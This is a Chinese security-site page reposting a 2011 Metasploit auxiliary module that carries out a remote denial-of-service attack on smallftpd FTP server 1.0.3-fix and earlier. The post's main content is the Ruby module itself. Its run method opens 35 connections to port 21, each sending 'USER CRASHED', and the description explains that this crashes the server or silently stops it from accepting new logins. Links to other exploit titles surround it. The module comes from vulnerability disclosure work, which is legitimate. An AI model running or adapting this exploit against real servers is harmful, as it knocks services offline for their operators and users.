首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Smallftpd 1.0.3 FTP Server Denial of Service Vulnerability
来源:http://yehg.net 作者:MyoSoe 发布时间:2011-06-28  

# Exploit Title: smallFTPD Connection Saturation Remote Denial of Service
# Date: June 27, 2011
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://smallftpd.sf.net
# Version: 1.0.3-fix and earlier
# Tested on: windows xp, seven, 2k3


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Auxiliary

 include Msf::Exploit::Remote::Tcp    
 include Msf::Auxiliary::Dos

 def initialize(info = {})
  super(update_info(info,
   'Name'  => 'smallFTPD Connection Saturation Remote Denial of Service',
   'Description' => %q{
    This module triggers unauthenticated Denial-of-Service condition in SmallFTPD server versions 1.0.3-fix and earlier with a few dozens of connection requests. The vulnerability is probably conerned with smallftpd being unable to handle multiple connections regardless of its maximum connection settings. Upon successful DoS exploit, the smallftpd will crash or still seem functioning by showing its service banner. But in fact it stops denying new FTP  requests, which can be verified only through a valid login.
   },
   'Author'   => [ 'Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>' ],
   'License'         => MSF_LICENSE,
   'Version'         => '$Revision:  $',
   'References'     =>
    [
     [ 'URL', 'http://core.yehg.net/lab/pr0js/advisories/smallftpd_103-fix_saturation_dos' ]
    ],
   'DisclosureDate' => 'June 2010'))

   register_options(
    [
     Opt::RPORT(21)
    ],self.class)
 end

 def run

  print_status("Sending DOS Packets ...")
  
  35.times do |x|
   connect
   sock.put("USER CRASHED\r\n")   
   disconnect
  end
  
  print_good("Done")   

 end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Citrix Provisioning Services 5
·HP Data Protector 6.20 Multipl
·Valve Steam Client Application
·FreeAmp 2.0.7 .PLS File Buffer
·Microsoft Office Visio VISIODW
·Siemens FactoryLink 8 CSServic
·Lotus Notes 8.0.x - 8.5.2 FP2
·HTTrack Website Copier V3.44 D
·Free YouTube Download v2.10 DL
·Avira AntiVir Personal V10.00.
·Xilisoft Video-Converter v.5 (
·Multiple vulnerabilities in HP
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved